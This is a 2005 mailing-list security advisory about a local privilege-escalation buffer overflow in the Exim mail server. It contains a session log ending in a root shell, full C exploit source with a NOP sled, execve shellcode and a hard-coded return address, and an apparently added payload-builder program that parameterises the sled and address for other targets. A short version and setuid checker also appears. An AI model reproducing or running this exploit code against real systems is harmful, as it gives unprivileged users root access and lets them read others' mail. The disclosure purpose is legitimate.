[EXPL] Exim Buffer Overflow Exploit (Local, dns_build_reverse)

Subject: [EXPL] Exim Buffer Overflow Exploit (Local, dns_build_reverse)
Date: 26 May 2005 18:06:07 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  Exim Buffer Overflow Exploit (Local, dns_build_reverse)
------------------------------------------------------------------------


SUMMARY

 <http://www.exim.org/> Exim is "a mail transfer agent (MTA) for Unix 
systems similar to Sendmail". Local exploitation of a 
<http://www.securiteam.com/unixfocus/5CP0D1PEKW.html> buffer overflow 
vulnerability in dns_build_reverse() in Exim 4.41 and earlier allows a local 
user to execute arbitrary commands with elevated privileges. The Exim binary 
is normally installed setuid root, and the overflow is reachable from the 
command line: the exploit below passes an overlong host address as the 
argument to exim -bh (the SMTP host-testing mode) and, on a vulnerable 
system, lands in a root shell. The exploit code can therefore be used to 
determine whether your system is vulnerable or not. Note that it relies on a 
hard-coded stack address, so a run that merely crashes is not proof that the 
system is safe.

DETAILS

Vulnerable Systems:
 * Exim version 4.41 and earlier (the session below is against 4.40)
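As an added check that is not part of the original advisory, the program below decides whether the first line of `exim -bV` output reports a version in the affected range and whether the binary is installed setuid root, which is what makes the -bh overflow a local privilege escalation rather than a self-inflicted crash. The banner string is copied from the session below as a constructed sample; the cutoff of 4.41 is taken from this advisory and the path /usr/exim/bin/exim from the session, and both are assumptions for your own installation.

```c
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

/* Parse "Exim version X.YY ..." (first line printed by `exim -bV`).
 * Returns 1 and fills major/minor on success, 0 if the line is not
 * an Exim banner. */
int parse_exim_version(const char *banner, int *major, int *minor)
{
    return sscanf(banner, "Exim version %d.%d", major, minor) == 2;
}

/* Affected per this advisory: 4.41 and earlier (assumption: the
 * advisory names 4.41 and demonstrates against 4.40).
 * Returns 1 = affected, 0 = not affected, -1 = unrecognised banner. */
int exim_version_affected(const char *banner)
{
    int major, minor;
    if (!parse_exim_version(banner, &major, &minor))
        return -1;
    if (major < 4)
        return 1;
    if (major == 4 && minor <= 41)
        return 1;
    return 0;
}

/* Is the file at path owned by root with the setuid bit set?
 * Returns 1 if so, 0 if not, -1 if it cannot be stat()ed. */
int is_setuid_root(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (st.st_uid == 0 && (st.st_mode & S_ISUID)) ? 1 : 0;
}

int main(void)
{
    /* Constructed sample: the banner from the session on this page. */
    const char *banner = "Exim version 4.40 #1 built 23-May-2005 22:31:34";
    const char *path = "/usr/exim/bin/exim";      /* assumed install path */
    int v = exim_version_affected(banner);
    int s = is_setuid_root(path);

    printf("version affected:   %s\n", v == 1 ? "yes" : v == 0 ? "no" : "unknown");
    printf("setuid root binary: %s\n", s == 1 ? "yes" : s == 0 ? "no" : "not found");
    if (v == 1 && s == 1)
        printf("a local user can reach the -bh overflow as root\n");
    return 0;
}
```

Distributions backport security fixes without bumping the version, so the version test is only a hint; the exploit run the advisory describes remains the definitive test, and a binary that is not setuid root turns the bug into a plain crash of the invoking user's own process.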

Example (exim -bh echoes back the host address it was given, so the NOP 
sled and shellcode appear as non-printable bytes in the output before the 
root shell prompt):
plug@bug:~$ uname -a
Linux bug 2.6.8-2-686 #1 Mon Jan 24 03:58:38 EST 2005 i686 GNU/Linux
plug@bug:~$ /usr/exim/bin/exim -bV
Exim version 4.40 #1 built 23-May-2005 22:31:34
Copyright (c) University of Cambridge 2004
Berkeley DB: Sleepycat Software: Berkeley DB 4.2.52: (December  3, 2003)
Support for: iconv()
Lookups: lsearch wildlsearch nwildlsearch iplsearch dbm dbmnz
Authenticators:
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile autoreply pipe smtp
Fixed never_users: 0
Configuration file is /usr/exim/configure
plug@bug:~$
plug@bug:~$
plug@bug:~$ ./exim-exploit
Firing up exim - cross your fingers for shell!

**** SMTP testing session as if from host
::%A:::::::::::::::::1 FF  V
                                                            
        N 1  @      /bin/sh
**** but without any ident (RFC 1413) callback.
        
**** This is not for real!

host in host_lookup? yes (matched "*")
looking up host name for ::%A:::::::::::::::::1 FF  V
                                                       
N 1  @      /bin/sh
IP address lookup using gethostbyaddr()
IP address lookup failed: h_errno=1
LOG: no host name found for IP address
::%A:::::::::::::::::1 FF  V
                                                            
     N 1  @      /bin/sh
sh-2.05b#
     
sh-2.05b#
sh-2.05b#
sh-2.05b# whoami
root
sh-2.05b#
sh-2.05b# exit
exit
plug@bug:~$

Exploit:
/*
 * ripped straight off iDEFENSE advisory - so lazy I just picked
 * up GDB... bored on a weeknight :(
 *
 * nothing to write home to mother about due to the fact that
 * you need a local user account on a server and all you
 * get is to read other people's emails ....
 *
 * not even my own shellcode. aleph1 shellcode - cut and paste job
 * with nops to pad.
 *
 * Regards,
 * Plugger aka Tony Lockett
 *
 *
 *
 */

#include <stdio.h>
#include <unistd.h>

/* The payload is handed to exim as the host address argument of -bh.
 * Layout: 21-byte address prefix, 218-byte NOP sled, 45 bytes of
 * shellcode, 4-byte return address (0xbffff2f4, little-endian).
 * No explicit size so the literal keeps its NUL terminator, which
 * execve() needs to find the end of the argument. */
char bomb[] =

/* the gear from iDEFENSE */
"::%A:::::::::::::::::"                             /* 21 bytes  */
                                                    /* --------  */
/* NOPS for padding */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90"                                          /* 218 bytes */
                                                    /* --------- */
/* actual code courtesy Aleph1 */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"  /* 12 bytes  */
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"  /* 12 bytes  */
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80"              /* 9 bytes   */
"\xe8\xdc\xff\xff\xff/bin/sh"                       /* 12 bytes  */

/* where EIP should point - specific to the stack layout of the
 * machine in the session above; adjust for your target */
"\xf4\xf2\xff\xbf";                                 /*  4 bytes  */
                                                    /* --------  */
                                                    /* 49 bytes  */
                                                    /* --------  */
                                                    /* 288 bytes */
                                                    /* ========= */
int main(void)
{
  char *exim[4];
  exim[0] = "/usr/exim/bin/exim";
  exim[1] = "-bh";
  exim[2] = bomb;
  exim[3] = NULL;
  printf("Firing up exim - cross your fingers for shell!\n");
  execve(exim[0], exim, NULL);
  /* only reached if the exec itself failed */
  perror("execve");
  return 1;
}
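As an added example, not the original exploit and not Exim code, the builder below assembles the same payload layout programmatically so that the sled length and return address are parameters instead of hand-counted bytes, and it enforces the constraint the delivery path imposes: the payload travels as an argv string through execve(), which stops at the first NUL, so no byte of the prefix, sled, shellcode or return address may be 0x00. The values 218 and 0xbffff2f4 are the ones hard-coded in the exploit above and were only valid for that machine's stack; on a system with address space layout randomisation or a non-executable stack this whole approach fails regardless of the address chosen.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stddef.h>

/* Pieces of the payload, taken from the exploit above. */
static const char PREFIX[] = "::%A:::::::::::::::::";            /* 21 bytes */
static const unsigned char SHELLCODE[] =                          /* 45 bytes, Aleph One */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
    "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
    "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80"
    "\xe8\xdc\xff\xff\xff/bin/sh";
#define PREFIX_LEN    (sizeof(PREFIX) - 1)
#define SHELLCODE_LEN (sizeof(SHELLCODE) - 1)

/* Offset at which the return address lands for a given sled length. */
size_t ret_offset(size_t sled)
{
    return PREFIX_LEN + sled + SHELLCODE_LEN;
}

/* Build prefix | NOP sled | shellcode | return address (little-endian)
 * into out and NUL-terminate it.  Returns the payload length, or -1 if
 * it does not fit in out or would contain a NUL byte, which execve()
 * would treat as the end of the argument. */
int build_payload(unsigned char *out, size_t outlen, size_t sled, uint32_t ret)
{
    size_t total = ret_offset(sled) + 4;
    if (total + 1 > outlen)
        return -1;

    memcpy(out, PREFIX, PREFIX_LEN);
    memset(out + PREFIX_LEN, 0x90, sled);
    memcpy(out + PREFIX_LEN + sled, SHELLCODE, SHELLCODE_LEN);

    unsigned char *r = out + ret_offset(sled);
    r[0] = (unsigned char)(ret & 0xff);
    r[1] = (unsigned char)((ret >> 8) & 0xff);
    r[2] = (unsigned char)((ret >> 16) & 0xff);
    r[3] = (unsigned char)(ret >> 24);
    out[total] = '\0';

    /* Reject any payload that argv delivery would truncate. */
    if (memchr(out, 0, total) != NULL)
        return -1;
    return (int)total;
}

int main(void)
{
    unsigned char buf[512];

    /* The exploit's own parameters: 218-byte sled, EIP -> 0xbffff2f4. */
    int n = build_payload(buf, sizeof buf, 218, 0xbffff2f4u);
    printf("payload length %d, return address at offset %zu\n", n, ret_offset(218));

    /* An address containing a zero byte cannot be delivered this way. */
    int bad = build_payload(buf, sizeof buf, 218, 0xbffff200u);
    printf("address 0xbffff200: %s\n", bad < 0 ? "rejected (NUL byte)" : "accepted");
    return 0;
}
```

The NUL check is the reason Aleph One's shellcode is usable here at all: it was written to be free of zero bytes, and it terminates "/bin/sh" itself at run time with the `mov [esi+7], al` instruction rather than relying on a NUL in the payload.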


ADDITIONAL INFORMATION

The information has been provided by  <mailto:plug@internode.on.net> 
plugger.


